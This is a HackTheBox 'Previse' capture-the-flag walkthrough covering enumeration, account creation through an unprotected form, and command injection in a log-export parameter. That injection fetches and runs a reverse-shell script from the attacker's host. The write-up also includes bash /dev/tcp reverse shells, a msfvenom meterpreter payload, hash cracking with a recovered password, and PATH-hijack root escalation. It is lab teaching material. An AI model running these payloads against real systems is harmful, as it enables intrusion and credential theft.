HackTheBox | Previse

0xBEN -

Nmap Scan

# Nmap 7.91 scan initiated Thu Aug 12 12:27:49 2021 as: nmap -T4 -p- -A -oA scan-advanced 10.10.11.104
Nmap scan report for 10.10.11.104
Host is up (0.013s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=8/12%OT=22%CT=1%CU=37645%PV=Y%DS=2%DC=T%G=Y%TM=61154C2
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=105%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   12.11 ms 10.10.14.1
2   12.17 ms 10.10.11.104

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 12 12:28:18 2021 -- 1 IP address (1 host up) scanned in 29.87 seconds




Service Enumeration

HTTP

target=10.10.11.104

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100 -x php

/header.php           (Status: 200) [Size: 980]  
/nav.php              (Status: 200) [Size: 1248]  
/footer.php           (Status: 200) [Size: 217]    
/css                  (Status: 301) [Size: 310] [--> http://10.10.11.104/css/]  
/download.php         (Status: 302) [Size: 0] [--> login.php]                    
/status.php           (Status: 302) [Size: 2968] [--> login.php]                 
/login.php            (Status: 200) [Size: 2224]                                 
/js                   (Status: 301) [Size: 309] [--> http://10.10.11.104/js/]    
/logout.php           (Status: 302) [Size: 0] [--> login.php]                    
/accounts.php         (Status: 302) [Size: 3994] [--> login.php]                 
/index.php            (Status: 302) [Size: 2801] [--> login.php]                 
/config.php           (Status: 200) [Size: 0]                                    
/logs.php             (Status: 302) [Size: 0] [--> login.php]                    
/files.php            (Status: 302) [Size: 4914] [--> login.php]

accounts.php looks interesting. Start Burp Suite, navigate to http://10.10.11.104/accounts.php and intercept the request.

<form role="form" method="post" action="accounts.php">
	<div class="uk-margin">
			<div class="uk-inline">
				<span class="uk-form-icon" uk-icon="icon: user"></span>
				<input type="text" name="username" class="uk-input" id="username" placeholder="Username">
			</div>
	</div>
	<div class="uk-margin">
		<div class="uk-inline">
			<span class="uk-form-icon" uk-icon="icon: lock"></span>
			<input type="password" name="password" class="uk-input" id="password" placeholder="Password">
		</div>
	</div>
	<div class="uk-margin">
		<div class="uk-inline">
			<span class="uk-form-icon" uk-icon="icon: lock"></span>
			<input type="password" name="confirm" class="uk-input" id="confirm" placeholder="Confirm Password">
		</div>
	</div>
	<button type="submit" name="submit" class="uk-button uk-button-default">CREATE USER</button>
</form>

Looks like there is a web form to create a user account. I will attempt to create a new user with the curl command and an HTTP POST request.

curl -X POST -F 'username=testuser' -F 'password=testpassword' -F 'confirm=testpassword' http://10.10.11.104/accounts.php

I am able to login using the account I created. Next, I download the backup of the site at http://10.10.11.104/files.php, as I suspect there may be some source code available for review.

There is, indeed, source code for the web page. There are cleartext credentials in config.php. I also found that logs.php does not sanitize input on the delim parameter. 

exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");

The logs.php script is called by the file_logs.php script.





Exploit

First, I create a simple bash reverse shell.

#!/bin/bash
bash -i >& /dev/tcp/<kali-ip>/443 0>&1

I start a listener on TCP 443. Then, I open Burp Suite and navigate to http://10.10.11.104/file_logs.php. I change the parameter in the POST body.

delim=; wget http://<kali-ip>/shell.sh; bash shell.sh

I forward the request on via Burp and catch a reverse shell.

Next, I create a meterpreter reverse shell for more versatility on the target.

msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<kali-ip> LPORT=444 -f elf -o supershell

Then, I start msfconsole and run multi/handler.

use exploit/multi/handler
set LPORT 444
set LHOST tun0
set payload linux/x64/meterpreter_reverse_tcp
run

I run a Python web server and grab the meterpreter reverse shell payload from the target.

cd /tmp
wget http://kali-ip/supershell
chmod +x supershell
./supershell

I drop down into a system shell and try connecting to the database.

mysql -u root -p'cleartextpassword'
show databases;
use previse;
select * from accounts;

I got a username of m4lwhere and a hash from the database. I copy it locally and try cracking it with john.

john --format=md5crypt --wordlist=rockyou.txt hash
?:ilovecody112235!

I SSH into the target as the user m4lwhere and check user privileges.

sudo -l

User m4lwhere may run the following commands on previse:  
   (root) /opt/scripts/access_backup.sh

I inspect the contents of the script

#!/bin/bash

# We always make sure to store logs, we take security SERIOUSLY here

# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time

gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz




Privilege Escalation

The backup script is calling gzip by its relative path name and it is being called as root. I should be able to inject a malicious gzip via the $PATH variable. 

PATH=/home/m4lwhere:$PATH

I create the file /home/m4lwhere/gzip.

#!/bin/bash
bash -i >& /dev/tcp/kali-ip/53 0>&1

Make it executable and double-check that it is going to load my script by running which gzip. It is loading from /home/m4lwhere.

sudo /opt/scripts/access_backup.sh